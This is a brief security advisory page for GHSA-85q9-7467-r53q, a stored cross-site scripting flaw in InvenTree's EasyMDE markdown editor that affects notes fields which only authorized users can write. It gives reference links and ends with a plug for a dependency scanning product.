GHSA-85q9-7467-r53q: XSS Vulnerability in Markdown Editor

June 17, 2022 (updated April 24, 2026)

InvenTree uses EasyMDE for displaying markdown text in various places (e.g. for the various “notes” fields associated with various models).

By default, EasyMDE does not sanitize input data, and it is possible for malicious code to be injected into the markdown editor, and executed in the users browser.

Note: This malicious data must be first uploaded to the database by an authorized user, so the risk here is limited to trusted users

References

github.com/advisories/GHSA-85q9-7467-r53q
github.com/inventree/InvenTree/security/advisories/GHSA-85q9-7467-r53q

Code Behaviors & Features

Detect and mitigate GHSA-85q9-7467-r53q with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →